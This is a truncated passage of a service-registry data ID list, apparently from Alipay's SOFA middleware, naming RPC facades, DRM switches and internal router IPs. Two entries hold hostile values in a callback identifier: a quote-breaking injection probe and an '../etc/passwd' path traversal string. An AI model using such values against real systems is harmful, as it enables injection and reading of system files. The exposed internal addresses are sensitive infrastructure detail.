ProviderService:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.SlaContractServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openeco.coc.ecomodel.api.station.GoodsAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:settleprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ProductListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ExpiredTradeOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.zpaas.zappinfo.core.service.tldc.TLDCConfigDRMResource.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oasis.biz.service.impl.cluster.manager.service.methodtest.MethodRestInvoker#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.idmp.common.service.facade.api.dmp.CrowdServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.SavingPlanDrmImpl.maxCreatedSavingPlan,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.mif.common.service.facade.brand.BrandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.findecision.common.service.facade.channels.ChannelDetectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.relation.PlayUserRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.facade.core.change.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_TRADEAPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.235.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.drm.InsConfigDRMSevice.inspricecoreFacadeMigrateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:psbp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.auth.api.WhiteListTairManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.label.SecurityLabelService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MrchProdLimitSetMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.CompanyExecutiveHoldingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.RewardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.StorePluginRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.facade.api.ToolsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:compass_eventHandlingProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_W_DW-SCHEDULE-01#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ipayment.service.facade.slip.api.SlipFrontConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.spamTitleThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.opscore.common.event.EventReceiver:1.0:ALIPAY_ORIGIN_PAAS_OPS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.service.facade.zmgo.SettleAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.pcredit.rule.RuleEngineDemo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.openapi.oauth.OAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.cfin.cfcif.facade.agreement.AgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instanalysis.common.service.facade.analyse.ReportEventHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizops.facade.GetExecutionInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.CertificateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.afsc.common.service.thor.service.ThorCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finbaservice.common.service.facade.p2preservationpoolstat.api.P2pReservationPoolInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policy.api.InsureTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.ecologyPointVoucherSingleRestrictionMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revtrans:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocore.common.manager.facade.CampBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.dataset.DataSetTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmMerchantContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../../../../../../../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","instdispute@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.96.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.partner.PartnerMpProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.214.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_codetypeActivationCheckAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.audit.core.repository.drm.RepositoryConfigResource.repositoryConfigProperty,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:pcreditmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcomment.common.service.facade.api.interaction.InteractionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_transToAlipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskFactorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.promo.CampLotteryExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.RiskTaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityProjectVolunteerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:pclbStrategyConfigController@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.otp.service.chinaunicom.facade.CuOtpManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.AreaFacade:1.0:orgAreaFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acgotonecore.facade.service.GotoneBatchServiceForInternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertVerifyInfoManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.draft.DraftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.FundCompanyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.DimTableOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.servicelibrary.ServiceLibraryMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.SiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.DictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpVoucherProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.FundInvestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.core.service.gray.grayConfigDrmHandler.insureFuseText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.PreChargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.analysis.PerspectDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.mosng.service.facade.ApiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.69.255.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.common.service.facade.std.TagConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bpaas.trade.facade.basetrade.BuyerPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.shangshu.dtcrawlerbase.config.loader.ConfigLoaderApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.biz.rpc.externalpoint.ExternalPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.TaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.ins.InsInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimcenter.common.service.InsClaimScenePolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.config.ClusterConfig.slaveInitWait,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.unitradeprod.common.facade.service.OrderCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibank.mobiledsp.adapterservice.MobileAdapterService:1.0:testapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.autoTraceConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instpay.settleprod.service.facade.gcard.PhoneCardReceiveResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:accessApply_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.extension.component.InterfaceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.common.service.facade.api.ConfigEntranceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResAppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.spi.MiniAppAuthorityFacade:1.0:alipayiotMiniAppAuthorityFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.DeclareAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.resource.facade.BusinessUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LendPPConfigDrm.lendPPConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.FundToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.forceRepaySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.seekers.facade.apis.EntityCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.PlatformAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.194.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.biz.service.mobilegw.member.MerchantSummaryInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antrecluse.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.InteractionTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.comp.TenantQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.RestTokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.gremlin.GremlinAppsProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressionRuleMngNewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.contentsync.ContentSyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.sfSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.report.facade.base.RccenterUprcSrcTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mappprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_192.168.2.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insautomarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.56.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.208.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifcauthcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selfoptmng.facade.auditprocess.ProcessConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yfd.common.service.facade.dm.DomainModelMetaLoadServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DEFAULT_UNIFORM_EVENT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.110.109.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeval.common.service.facade.safeguardhelper.TemplateMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:easyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:touchPointApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:settlementprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.migrationActionMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rpc.common.service.facade.zproxy.ZproxySampleService:1.0:inscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:inspect_async@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changerequirement.facade.spi.ChangeIterationSpi:1.0:opscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.DataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.SalaryBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.common.service.facade.life.LifeNotifyInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iglobalfundcontrol.facade.api.EntityLicenseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.rest.ArOperationSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityassistant.common.service.facade.complain.openreport.SendReportEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.process.BusinessProcessStateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopenscene.facade.live.LiveConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zqualitywalleetoe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.185.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csassistant.service.facade.api.AssistantTenantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.157.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insrenewprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.remark.ContactRemarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpplanning@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.mortgage.facade.DisposeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.cashlessSloganInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.baopoint.api.BpdtransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.AssetQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_ALI_HR_MASTERDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.LocalCacheConfigDrm.localCacheConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.facade.api.GuideservicePersonalSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dscore.common.service.facade.RegionStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.spm.SpmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.AcctransSpecialFreezeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.giftprod.common.config.drm.wufu2021.ActivityTaskDrm.onlineDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.grayctrl.GrayCtrlCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.trigger.CheckRouteDataCollectConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.service.cert.facade.CertRelevantService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.CarinaProxyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opencore.service.facade.app.AppApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbprod.common.service.facade.consumetrade.service.ConsumeTransPurchaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.abTestExcludeProperties,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.api.SecumngNewsInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfoprod.common.service.cds.facade.CommonContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditauthfront.service.facade.PcreditPreAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.ServiceRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.query.FintradeBusinessTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.openhome:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.D